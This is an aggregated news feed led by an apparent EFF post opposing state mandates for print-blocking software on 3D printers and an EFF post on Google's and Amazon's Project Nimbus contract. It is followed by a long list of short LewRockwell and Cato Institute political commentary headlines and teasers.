    This is the first post in a series on 3D print blocking, for the next entry check out Print Blocking Won't Work - Permission to Print Part 2 When legislators give companies an excuse to write untouchable code, it’s a disaster for everyone. This time, 3D printers are being targeted across a growing number of states. Even if you’ve never used one, you’ve benefited from the open commons these devices have created—which is now under threat. This isn’t the first time we’ve gone to bat for 3D printing. These devices come in many forms and can construct nearly any shape with a variety of materials. This has made them absolutely crucial for anything from life-saving medical equipment, to little Iron Man helmets for cats, to everyday repairs. For decades these devices have been a proven engine for innovation, while democratizing a sliver of manufacturing for hobbyists, artists, and researchers around the world. For us all to continue benefiting from this grassroots creativity, we need to guard against the type of corporate centralization that has undermined so much of the promise of the digital era.  Unfortunately some state legislators are looking to repeat old mistakes by demanding printer vendors install an enshittification switch. In the U.S, three states have recently proposed that commercial 3D-printer manufacturers must ensure their printers only work with their software, and are responsible for checking each print for forbidden shapes—for now, any shape vendors consider too gun-like. The 2D equivalent of these “print-blocking” algorithms would be demanding HP prevent you from printing any harmful messages or recipes. Worse still, some bills can introduce criminal penalties for anyone who bypasses this censorware, or for anyone simply reselling their old printer without these restrictions.  If this sounds like Digital Rights Management (DRM) to you, you’ve been paying attention. This is exactly the sort of regulation that creates a headache and privacy risk for law-abiding users, is a gift for would-be monopolists, and can be totally bypassed by the lawbreakers actually being targeted by the proposals. Ghosting Innovation “Print blocking” is currently coming for an unpopular target: ghost guns. These are privately made firearms (PMFs) that are typically harder to trace and can bypass other gun regulations. Contrary to what the proposed regulations suggest, these guns are often not printed at home, but purchased online as mass-produced build-it-yourself kits and accessories. Scaling production with consumer 3D printers  is expensive, error-prone, and relatively slow.  Successfully making a working firearm with just a printer still requires some technical know-how, even as 3D printers improve beyond some of these limitations. That said, many have concerns about unlicensed firearm production and sales. Which is exactly why these practices are already illegal in many states, including all of the states proposing print blocking.  Mandating algorithmic print-blocking software on 3D printers and CNC machines is just wishful thinking. People illegally printing ghost guns and accessories today will have no qualms with undetectably breaking another law to bypass censoring algorithms. That’s if they even need to—the cat and mouse game of detecting gun-like prints might be doomed from the start, as we dive into in this companion post. Meanwhile, the overwhelming majority of 3D-printer users do not print guns. Punishing innovators, researchers, and hobbyists because of a handful of outlaws is bad enough, but this proposal does it by also subjecting everyone to the anticompetitive and anticonsumer whims of device manufacturers. Can’t make the DRM thing work We’ve been railing against Digital Rights Management (DRM) since the DMCA made it a federal crime to bypass code restricting your use of copyrighted content. The DRM distinction has since been weaponized by manufacturers to gain greater leverage over their customers and enforce anti-competitive practices.  The same enshittification playbook applies to algorithmic print blockers.  Restricting devices to manufacturer-provided software is an old tactic from the DRM playbook, and is one that puts you in a precarious spot where you need to bend to the whims of the manufacturer.  Only Windows 11 supported? You need a new PC. Tools are cloud-based? You need a solid connection. The company shutters? You now own an expensive paperweight—which used to make paperweights. It also means useful open source alternatives which fit your needs better than the main vendor’s tools are off the table. The 3D-printer community got a taste of this recently, as manufacturer Bambu Labs pushed out restrictive firmware updates complicating the use of open source software like OrcaSlicer. The community blowback forced some accommodations for these alternatives to remain viable. Under the worst of these laws, such accommodations, and other workarounds, would be outlawed with criminal penalties. People are right to be worried about vendor lock-in, beyond needing the right tool for the job. Making you reliant on their service allows companies to gradually sour the deal. Sometimes this happens visibly, with rising subscription fees, new paywalls, or planned obsolescence. It can also be more covert, like collecting and selling more of your data, or cutting costs by neglecting security and bug fixes. With expensive hardware on the line, they can get away with anything that won’t make you pay through the nose to switch brands. Indirectly, this sort of print-blocking mandate is a gift to incumbent businesses making these printers. It raises the upfront and ongoing costs associated with smaller companies selling a 3D printer, including those producing new or specialized machines. The result is fewer and more generic options from a shrinking number of major incumbents for any customer not interested in building their own 3D printer. Reaching the Melting Point It’s already clear these bills will be bad for anyone who currently uses a 3D printer, and having alternative software criminalized is particularly devastating for open source contributors. These impacts to manufacturers and consumers culminate into a major blow to the entire ecosystem of innovation we have benefited from for decades.  But this is just the beginning.  Once the infrastructure for print blocking is in place, it can be broadened. This isn’t a block of a very specific and static design, like how some copiers block reproductions of currency. Banning a category of design based on its function is a moving target, requiring a constantly expanding blacklist. Nothing in this legislation restricts those updates to firearm-related designs. Rather, if we let proposals like this pass, we open the door to the database of forbidden shapes for other powerful interests. Intellectual property is a clear expansion risk. This could look like Nintendo blocking a Pikachu toy, John Deere blocking a replacement part, or even patent trolls forcing the hand of hardware companies. Repressive regimes, here or abroad, could likewise block the printing of "extreme" and “obscene” symbols, or tools of resistance like popular anti-ICE community whistles.  Finally, even the most sympathetic targets of algorithmic censorship will result in false positives—blocking 3D-printer users’ lawful expression. This is something proven again and again in online moderation. Whether by mistake or by design, a platform that has you locked in has little incentive to offer remedies to this censorship. And these new incentives for companies to surveil each print can also impose a substantial chilling effect on what the user chooses to create. While 3D printers aren’t in most households, this form of regulation would set a dangerous precedent. Government mandating on-device censors which are maintained by corporate algorithms is bad. It won’t work. It consolidates corporate power. It criminalizes and blocks the grassroots innovation and empowerment which has defined the 3D-printer community. We need to roundly reject these onerous restraints on creation. 

  • Google and Amazon: Acknowledged Risks, and Ignored Responsibilities
    by Betty Gedlu on April 2, 2026 at 3:12 pm

    In late 2024, we urged Google and Amazon to honor their human rights commitments, to be more transparent with the public, and to take meaningful action to address the risks posed by Project Nimbus, their cloud computing contract that includes Israel’s Ministry of Defense and the Israeli Security Agency. Since then, a stream of additional reporting has reinforced that our concerns were well-founded. Yet despite mounting evidence of serious risk, both companies have refused to take action.  Amazon has completely ignored our original and follow-up letters. Google, meanwhile, has repeatedly promised to respond to our questions. Yet more than a year and a half later, we have seen no meaningful action by either company. Neither approach is acceptable given the human rights commitments these companies have made. Additionally, Microsoft required a public leak before it felt compelled enough to look into and find that its client, the Israeli government, was indeed misusing its services in ways that violated Microsoft’s public commitments to human rights. This should have given both Google and Amazon an additional reason to take a close look and let the public know what they find, but nothing of the sort materialized.  In such circumstances, waiting for definitive proof is not responsible risk management, it is willful blindness. Google: Known Risks, No Meaningful Action Google’s own internal assessments warned of the risks associated with Project Nimbus even before the contract was signed. Major news outlets have reported that Google provides the Israeli government with advanced cloud and AI services under Project Nimbus, including large-scale data storage, image and video analysis, and AI model development tools. These capabilities are exceptionally powerful, highly adaptable, and well suited for surveillance and military applications. Despite those warnings, and the multiple reports since then about human rights abuses by the very portions of the Israeli government that uses Google’s and Amazon’s services, the companies continue to operate business as usual. It seems that they have taken the position that they do not need to change course or even publicly explain themselves unless the media or other external organizations present definitive proof that their tools have been used in specific violations of international human rights or humanitarian law. While that conclusive public evidence has not yet emerged for all the companies, the risks are obvious, and they are aware of them. Instead of conducting robust, transparent human rights due diligence, Amazon and Google are continually choosing to look the other way. Google’s own internal assessments undermine its public posture. According to reporting, Google’s lawyers and policy staff warned that Google Cloud services could be linked to the facilitation of human rights abuses. In the same report, Google employees also raised concerns that the company’s cloud and AI tools could be used for surveillance or other militarized purposes, which seems very likely given the Israeli government’s long-standing reliance on advanced data-driven systems to control and monitor Palestinians. Google has publicly claimed that Project Nimbus is “not directed at highly sensitive, classified, or military workloads” and is governed by its standard Acceptable Use Policies. Yet reporting has revealed conflicting representations about the contract’s terms, including indications that the Israeli government may be permitted to use any services offered in Google’s cloud catalog for any purpose. Google has declined to publicly resolve these contradictions, and its lack of transparency is problematic. The gap between what Google says publicly and what it knows internally should alarm anyone who hopes to take the company’s human rights commitments seriously. Google’s and Amazon’s AI Principles Require Proactive Action Even after being revised last year, Google’s AI Principles continue to commit the company to responsible development and deployment of its technologies, including implementing appropriate human oversight, due diligence, and safeguards to mitigate harmful outcomes and align with widely accepted principles of international law and human rights. While the updated principles no longer explicitly commit Google to avoiding entire categories of harmful use, they still require the company to assess foreseeable risks, employ rigorous monitoring and mitigation measures, and act responsibly throughout the full lifecycle of AI development and deployment. Amazon has similarly committed to responsible AI practices through its Responsible AI framework for AWS services. The company states that it aims to integrate responsible AI considerations across the full lifecycle of AI design, development and operation, emphasizing safeguards such as fairness, explainability, privacy and security, safety, transparency, and governance. Amazon also says its AI services are designed with mechanisms for monitoring, and risk mitigation to help prevent harmful outputs or misuse and to enable responsible deployment across a range of use cases. Google and Amazon have the knowledge, the leverage, and the responsibility to act now. Choosing not to is still a choice. Here, the risks are neither speculative nor remote. They are foreseeable, well-documented, and exacerbated by the context in which Project Nimbus operates, which is an ongoing military campaign marked by widespread civilian harm and credible allegations of grave human rights violations including genocide. In such circumstances, waiting for definitive proof is not responsible risk management, it is willful blindness. Modern cloud and AI systems are designed to be flexible, customizable, and deployable at scale, often beyond the vendor’s direct visibility. That reality is precisely why human rights due diligence must be proactive. Waiting for a leaked document or whistleblower account demonstrating direct misuse, as occurred in Microsoft’s case, means waiting until harm has already been done. Microsoft’s Experience Should Have Been Warning Enough As noted above, the recent revelations about Microsoft’s technologies being misused in violation of Microsoft’s commitments by the Israeli military illustrate the dangers of this wait-and-see approach. Google and Amazon should not need a similar incident to recognize what is at stake. The demonstrated misuse of comparable technologies, combined with Google’s and Amazon’s own knowledge of the risks associated with Project Nimbus, should already be sufficient to trigger action. The appropriate response is to act responsibly and proactively. Google and Amazon should immediately: Conduct and publish an independent human rights impact assessment of Project Nimbus. Disclose how they evaluate, monitor, and enforce compliance with their AI Principles in high-risk government contracts, including and especially in Project Nimbus. Commit to suspending or restricting services where there is a credible risk of serious human rights harm, even if definitive proof of misuse has not yet emerged. Waiting Is a Choice, and Not One That Protects Human Rights Google and Amazon publicly emphasize their commitment to responsible AI and respect for human rights. Those commitments are meaningless if they apply only once harm is undeniable and irreversible. In conflict settings, especially where secrecy and information asymmetry are the norm, companies must act on credible risk, not perfect evidence. Google and Amazon have the knowledge, the leverage, and the responsibility to act now. Choosing not to is still a choice, and one that carries real consequences for people whose lives are already at risk.

  • Ron Paul: Still The Voice of Reason
    by Charles Burris on March 31, 2026 at 11:36 pm

    The true heroic voice of reason concerning the past and present disastrous adventurism such as the Afghanistan quagmire is certainly not war criminals George W. Bush, Dick and Liz Cheney, Bill and Hillary Clinton, Barack Obama, and Joe Biden. It is 2012 presidential candidate Ron Paul. He remains the voice of clarity directing his Ron The post Ron Paul: Still The Voice of Reason appeared first on LewRockwell.

  • New York Times: ’13 U.S. Bases Uninhabitable’ — We Could’ve Just Marched Home
    by Daniel McAdams on March 27, 2026 at 4:34 pm

    For decades, Ron Paul has called for closing all foreign U.S. bases and bringing all of our troops home. “We just marched in. We should just march out.” But alas, this “American First” policy recommendation was ignored. Perpetual war was too engrained in the government and their special interest benefactors. Now, what should have been The post New York Times: ’13 U.S. Bases Uninhabitable’ — We Could’ve Just Marched Home appeared first on LewRockwell.

  • War Isn’t Free … How The American People Pay Dearly For It
    by Daniel McAdams on March 20, 2026 at 4:35 pm

    Just because we don’t get invoices in the mail, doesn’t mean we don’t pay dearly for the empire’s senseless wars. Most of us Americans have been hammered our entire lives to pay for them. It was hoped that the long-train of disasters was coming to an end with the second Trump Administration. But alas, it The post War Isn’t Free … How The American People Pay Dearly For It appeared first on LewRockwell.

  • Trump & Netanyahu: Who’s the boss? Maybe we’ll find out
    by Daniel McAdams on March 19, 2026 at 4:38 pm

    Israeli Prime Minister Benjamin Netanyahu made many trips to the U.S. last year. And now here we are, in the middle of a gigantic mess in the Middle East (again). The widely anticipated expectation of President Trump putting “America First” and “Making America Great Again” seem like fleeting memories now. The post Trump & Netanyahu: Who’s the boss? Maybe we’ll find out appeared first on LewRockwell.

  • Trump vs. NATO — Would He Actually Leave?
    by Daniel McAdams on March 18, 2026 at 4:45 pm

    NATO should have been disbanded when the Warsaw Pact was disbanded in 1991. Its continuance has been a drain on the American people ever since. But the Empire, despite its protestations, gains many benefits from keeping NATO around. NATO is one of the primary ways that the Empire maintains great “influence” over Europe. So will The post Trump vs. NATO — Would He Actually Leave? appeared first on LewRockwell.

  • Counting The Costs: Another War Is Not What America Needed
    by Daniel McAdams on March 6, 2026 at 5:44 pm

    It’s not hyperbole to say that America is broken; badly broken. The hope that Donald Trump would put America on the right path has also been broken. Yet another Middle East war is the very last thing that our nation needed. With each passing moment, the costs are mounting. How much can the American people, The post Counting The Costs: Another War Is Not What America Needed appeared first on LewRockwell.

  • Should Libertarians Celebrate “Operation Epic Fury”?
    by Thomas DiLorenzo on March 3, 2026 at 11:22 pm

    That of course is the idiotic name the neocons have given to their latest invasion of a Middle East country by the U.S./Israeli armies. Javier Milei immediately joined with his fellow Zionist neocons to “celebrate” the invasion. Those of us who knew Murray Rothbard can just hear him shouting that Milei’s “celebration” is “Monstrous!” Milei The post Should Libertarians Celebrate “Operation Epic Fury”? appeared first on LewRockwell.

  • Tucker on Operation Epstein Fury
    by Dale Steinreich on March 2, 2026 at 9:16 pm

    Israel’s war and what it means. pic.twitter.com/P9D7UGq40W — Tucker Carlson (@TuckerCarlson) March 2, 2026 The post Tucker on Operation Epstein Fury appeared first on LewRockwell.

  • Rothbard at 100
    by Thomas DiLorenzo on March 2, 2026 at 12:03 pm

    Today, March 2, would have been Murray Rothbard’s 100th birthday. Rothbard’s intellectual heir, Hans-Hermann Hoppe, has published on his Property and Freedom Society Web sit a tribute to his mentor that includes twenty new essays and much more. Hans is widely regarded all over the world as Rothbard’s most important intellectual heir and his closest The post Rothbard at 100 appeared first on LewRockwell.

  • US Citizen Executed by Israeli Settlers as Israel Aims to Further Control the West Bank
    by Joshua Shoenfeld on February 24, 2026 at 2:01 am

    Nasrallah Abu Siyam, a 19-year-old Palestinian-American man, was executed by illegal Israeli settlers in the West Bank on Wednesday.  Abu Siyam was among about 30 residents of Mukhmas who were trying to stop armed illegal settlers from stealing their goats.  Israeli settlers shot at least three of the villagers, including Abu Siyam. The US State The post US Citizen Executed by Israeli Settlers as Israel Aims to Further Control the West Bank appeared first on LewRockwell.

  • Epstein Files Are Just The Beginning… W/Robert Barnes
    by Charles Burris on February 18, 2026 at 7:16 pm

    The post Epstein Files Are Just The Beginning… W/Robert Barnes appeared first on LewRockwell.

  • China Buys Gold & Dumps Dollars
    by Daniel McAdams on February 13, 2026 at 5:39 pm

    Gold has been universal international money for thousands of years for many reasons; primarily because no government can control or counterfeit it. Naturally, some governments hate these natural restrictions. They want to spend money without restraint; and want to counterfeit their way to world domination. Alas, the United States took the latter road after WWII. The post China Buys Gold & Dumps Dollars appeared first on LewRockwell.

  • Voluntary Multipolar Globalization vs. Tyrannical Unipolar Globalization
    by Daniel McAdams on February 6, 2026 at 5:33 pm

    “Globalization” has been a buzzword for many years. But there are two types, and the distinction is extremely important. There’s the globalization of America’s founding, as laid out by Thomas Jefferson: “Peace, commerce and honest friendship with all nations entangling alliances with none.” And then there’s the modern globalization laid out by Paul Wolfowitz after The post Voluntary Multipolar Globalization vs. Tyrannical Unipolar Globalization appeared first on LewRockwell.

  • Does Congress Even Exist Anymore? Whose Fault Is This?
    by Daniel McAdams on January 23, 2026 at 5:32 pm

    We all grew up learning about the U.S. government’s supposed uniqueness; its built-in “checks and balances.” After all, the results of concentrated power without restraint are littered throughout all of human history. America was different…for awhile, at least. Congress was, in theory, the branch of government “closest to the people,” representing each state’s interests. Today? The post Does Congress Even Exist Anymore? Whose Fault Is This? appeared first on LewRockwell.

  • Discover the Shocking Truth Behind World War II that Still Impacts the World Today
    by Charles Burris on January 18, 2026 at 7:08 pm

    HITLERS GOLD — THE REAL STORY, SWISS BANKS, THE BIS, DULLES AND THE AFTERMATH   Since the Second World War we have been talking of the horrors of war, the battles, tanks, the men and machines. But none of it could have happened if not for the international industrialists, bankers and law-firms and banking cartels. The post Discover the Shocking Truth Behind World War II that Still Impacts the World Today appeared first on LewRockwell.

  • Price Controls Don’t Work — Not Even For President Trump
    by Daniel McAdams on January 16, 2026 at 5:32 pm

    Basic economic logic and thousands of years of recorded history have verified that price controls take a bad economic circumstance and make it even worse. But alas, President Trump, who seems to be looking for a quick fix to pacify public anger for the results of his policies, is pushing for price controls. Whether it The post Price Controls Don’t Work — Not Even For President Trump appeared first on LewRockwell.

  • Why Neocons Like Marco Rubio and Lindsey Graham are Responsible for the Minnesota Welfare Fraud Scandal
    by Thomas DiLorenzo on January 15, 2026 at 8:57 pm

    From Murray Rothbard’s 1994 essay, “Just War”: “The Somalian intervention [by the U.S. military] was a perfect case study in the workings of [the] Wilsonian dream. We began the intervention by extolling a ‘new kind of army (a model army if you will, engaged in a new kind of high moral intervention: the U.S. soldier The post Why Neocons Like Marco Rubio and Lindsey Graham are Responsible for the Minnesota Welfare Fraud Scandal appeared first on LewRockwell.

  • The Duran: Regime Change Escalator w/ Robert Barnes
    by Charles Burris on January 13, 2026 at 4:11 pm

    Not only is Robert Barnes a master litigator and top-notch attorney but one of the most in depth, articulate, well read and street-smart experienced political analysts in the nation. Whether it involves the institutionalized criminal machine cartels of the Democrats and Republicans or the deep state, he is a true polymath reminiscent of Murray N. The post The Duran: Regime Change Escalator w/ Robert Barnes appeared first on LewRockwell.

  • The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale
    by Charles Burris on January 10, 2026 at 5:19 pm

    Mike Benz — Riots, Revolution & A World on Fire This Week Mike Benz — CIA Cocaine Trade in Venezuela Complicates Maduro Charges Mike Benz chat with Grant Stinchfield tonight (1/8/26) on NewsMax Trump needs to wake up from the deep sleep slumber engendered by the deep state. For almost 100 years, the US has The post The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale appeared first on LewRockwell.

  • The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale
    by Charles Burris on January 10, 2026 at 3:16 pm

    Mike Benz — CIA Cocaine Trade In Venezuela Complicates Maduro Charges Mike Benz chat with Grant Stinchfield tonight (1/8/26) on NewsMax Trump needs to wake up from the deep sleep slumber engendered by the deep state. For almost 100 years, the US has had a narco-centric foreign policy. American War Machine: Deep Politics, the CIA The post The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale appeared first on LewRockwell.

  • The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale
    by Charles Burris on January 10, 2026 at 3:30 am

    Mike Benz — CIA Cocaine Trade In Venezuela Complicates Maduro Charges Mike Benz chat with Grant Stinchfield tonight (1/8/26) on NewsMax Trump needs to wake up from the deep sleep slumber engendered by the deep state. For almost 100 years, the US has had a narco-centric foreign policy. American War Machine: Deep Politics, the CIA The post The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale appeared first on LewRockwell.

  • The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale
    by Charles Burris on January 9, 2026 at 2:30 pm

    Mike Benz — CIA Cocaine Trade In Venezuela Complicates Maduro Charges Mike Benz chat with Grant Stinchfield tonight (1/8/26) on NewsMax Trump needs to wake up from the deep sleep slumber engendered by the deep state. For almost 100 years, the US has had a narco-centric foreign policy. American War Machine: Deep Politics, the CIA The post The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale appeared first on LewRockwell.

  • Empire-Mania: Trump Wants $1.5 Trillion Military Budget
    by Daniel McAdams on January 8, 2026 at 5:34 pm

    Trump/Vance was presented as “the peace ticket,” and was voted in with the expectation of focusing on America instead of the rest of the world. But alas, the addiction to Empire has proven to be too strong once again. The Trump Administration has been laser-focused on foreign nations, while our own nation continues to struggle The post Empire-Mania: Trump Wants $1.5 Trillion Military Budget appeared first on LewRockwell.

  • Mike Benz – Venezuela: A Hard-Nosed Realist Analysis of What Really Went Down
    by Charles Burris on January 7, 2026 at 9:12 pm

    The post Mike Benz – Venezuela: A Hard-Nosed Realist Analysis of What Really Went Down appeared first on LewRockwell.

  • Mike Benz: CIA Cocaine Trafficking In Venezuela – This is Part 4 of our Going Going, Back Back to Venezuela Stream
    by Charles Burris on January 6, 2026 at 8:36 pm

    This is Part 4 of our Going Going, Back Back To Venezuela stream. Part 1 here: • Going Going, Back Back, To Venezuela Venez… Part 2 here: • Going Going, Back Back, To Venezuela Venez… Part 3 here: • Going Going, Back Back, To Venezuela Venez… The post Mike Benz: CIA Cocaine Trafficking In Venezuela – This is Part 4 of our Going Going, Back Back to Venezuela Stream appeared first on LewRockwell.

  • Get Educated: Robert Barnes on Venezuela, Executive Power, International Law, and US Policy
    by Charles Burris on January 6, 2026 at 11:34 am

    Robert Barnes joins Nick Rekieta to discuss the recent apprehension of Nicolas Maduro, the head of Venezuela. Is this legally sound, is it preferable? Let’s talk about it. The post Get Educated: Robert Barnes on Venezuela, Executive Power, International Law, and US Policy appeared first on LewRockwell.

  • Help Celebrate the 135th Birthday of the Great Zora Neale Hurson by Watching this PBS documentary Zora Neale Hurston: Claiming A Space. She was a Legendary Writer of the Old Right, along with Rose Wilder Lane, Ayn Rand, and Isabel Paterson
    by Charles Burris on January 3, 2026 at 3:02 pm

    Black Libertarian: The Story of Zora Neale Hurston, by Marcus Epstein Isabel Paterson, Rose Wilder Lane, and Zora Neale Hurston on War, Race, the State, and Liberty, by David T. Beito and Linda Royster Beito Here the tone is celebratory yet deeply probing. The Beitos’ exploration of the commonality of character and individualistic temperament of The post Help Celebrate the 135th Birthday of the Great Zora Neale Hurson by Watching this PBS documentary Zora Neale Hurston: Claiming A Space. She was a Legendary Writer of the Old Right, along with Rose Wilder Lane, Ayn Rand, and Isabel Paterson appeared first on LewRockwell.

  • MTV Music Channels Sign Off Forever with the One that Started it all: ‘Video Killed the Radio Star’
    by Charles Burris on January 1, 2026 at 8:44 pm

    MTV’s dedicated music channels, including MTV Music, MTV 80s, and MTV 90s, ended their 24/7 music broadcasts globally on December 31, 2025, concluding with The Buggles’ “Video Killed the Radio Star,” the same video that launched the channel in 1981, marking the end of an era as streaming and on-demand viewing shifted audience habits. While The post MTV Music Channels Sign Off Forever with the One that Started it all: ‘Video Killed the Radio Star’ appeared first on LewRockwell.

  • Infrastructure Investment: A State, Local, and Private Responsibility
    by Cato Institute on June 18, 2022 at 10:37 am

    Infrastructure Investment: A State, Local, and Private Responsibility

  • The Next “Crisis”: The Debt Ceiling
    by Cato Institute on June 18, 2022 at 3:05 am

    The Next "Crisis": The Debt Ceiling

  • The Next “Crisis”: The Debt Ceiling
    by Cato Institute on June 18, 2022 at 3:05 am

    The Next "Crisis": The Debt Ceiling

  • What the Second Amendment Permits
    by Cato Institute on June 18, 2022 at 3:05 am

    What the Second Amendment Permits

  • James M. Buchanan, RIP
    by Cato Institute on June 18, 2022 at 3:05 am

    James M. Buchanan, RIP

  • China, America, and the Pivot to Asia
    by Cato Institute on June 18, 2022 at 3:04 am

    China, America, and the Pivot to Asia

  • Economic Freedom of the States of India
    by Cato Institute on June 18, 2022 at 3:04 am

    Economic Freedom of the States of India

  • Why the Hagel Nomination Matters
    by Cato Institute on June 18, 2022 at 3:04 am

    Why the Hagel Nomination Matters

  • A Rational Response to the Privacy ‘Crisis’
    by Cato Institute on June 18, 2022 at 3:04 am

    A Rational Response to the Privacy ‘Crisis’

  • New Regulation Tackles ObamaCare, TSA Screening
    by Cato Institute on June 18, 2022 at 3:04 am

    New <em>Regulation</em> Tackles ObamaCare, TSA Screening

  • Should U.S. Fiscal Policy Address Slow Growth or the Debt?
    by Cato Institute on June 18, 2022 at 3:04 am

    Should U.S. Fiscal Policy Address Slow Growth or the Debt?

  • Grading the Fiscal Cliff Deal
    by Cato Institute on June 18, 2022 at 3:04 am

    Grading the Fiscal Cliff Deal

  • Make a Year-End Gift to Cato
    by Cato Institute on June 18, 2022 at 3:03 am

    Make a Year-End Gift to Cato

  • Advantages of Low Capital Gains Tax Rates
    by Cato Institute on June 18, 2022 at 3:03 am

    Advantages of Low Capital Gains Tax Rates

  • Happy Holidays from Cato
    by Cato Institute on June 18, 2022 at 3:03 am

    Happy Holidays from Cato

  • How Fossil Fuels Saved Humanity from Nature and Nature from Humanity
    by Cato Institute on June 18, 2022 at 3:03 am

    How Fossil Fuels Saved Humanity from Nature and Nature from Humanity

  • An Inexorable March to Legalization?
    by Cato Institute on June 18, 2022 at 2:43 am

    An Inexorable March to Legalization?

  • Military Spending Cuts No Reason to Compromise on Taxes
    by Cato Institute on June 18, 2022 at 2:43 am

    Military Spending Cuts No Reason to Compromise on Taxes

  • The Fire Next Door: Mexico’s Drug Violence and the Danger to America
    by Cato Institute on June 18, 2022 at 2:43 am

    The Fire Next Door: Mexico's Drug Violence and the Danger to America

  • Has the Fed Been a Failure?
    by Cato Institute on June 18, 2022 at 2:43 am

    Has the Fed Been a Failure?

 

Lew Rockwell, EFF,